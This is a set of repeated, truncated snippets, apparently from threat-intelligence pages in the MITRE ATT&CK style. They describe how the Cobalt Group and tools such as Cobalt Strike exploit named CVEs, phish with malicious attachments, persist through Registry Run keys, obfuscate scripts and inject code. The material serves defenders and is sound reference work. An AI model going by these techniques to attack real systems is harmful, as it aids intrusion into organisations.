…lities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution. [23] [24] G0080 Cobalt Group Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-20…
…an search for processes with antivirus and antimalware product names. [10] [11] G0080 Cobalt Group Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine. [12] S0244 Comnie Comnie attempts to detect…
…ick on the malicious Word document to execute the next part of the attack. [42] G0080 Cobalt Group Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine. [43] [44] S0527 CSPY Downloader CSPY Downlo…
…d can be used to copy files to/from a remotely connected external system. [130] G0080 Cobalt Group Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. [131] [3] The group's JavaScript backdoor is also…
… S0144 ChChes ChChes establishes persistence by adding a Registry Run key. [51] G0080 Cobalt Group Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike. [52] S0338 Cobian R…
…red by sending victims a phishing email containing a malicious .docx file. [45] G0080 Cobalt Group Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc,…
…infected host. [65] G0114 Chimera Chimera has encoded PowerShell commands. [66] G0080 Cobalt Group Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4. [67] [68] S0154 Cobalt Strike Cobalt Strike can hash function…
…opper China Chopper 's server component can spider authentication portals. [19] G0080 Cobalt Group Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning. [20] [21] [22] S0154 Cobalt Strike Cobalt Strike can perform port scans fr…
…d can be used to copy files to/from a remotely connected external system. [140] G0080 Cobalt Group Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. [141] [4] The group's JavaScript backdoor is also…
…isting function within that process with a new function from that library. [25] G0080 Cobalt Group Cobalt Group has injected code into trusted processes. [26] S0154 Cobalt Strike Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary. [2…
…d a .NET Runtime Optimization vulnerability for privilege escalation. [14] [15] G0080 Cobalt Group Cobalt Group has used exploits to increase their levels of rights and privileges. [16] S0154 Cobalt Strike Cobalt Strike can exploit vulnerabilities such as MS14-058. [17] [18] S005…
…ing Clambling can establish persistence by adding a Registry run key. [62] [63] G0080 Cobalt Group Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike. [64] S0338 Cobian R…
… been delivered to victim's machines through malicious e-mail attachments. [60] G0080 Cobalt Group Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc,…
…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. Trend Micro Research. (2023, July 21). Ransomware Spotli…
…ich led to the download of a ZIP archive containing a malicious .LNK file. [23] G0080 Cobalt Group Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine. [24] [25] [26] G0142 Confucius Confucius has lure…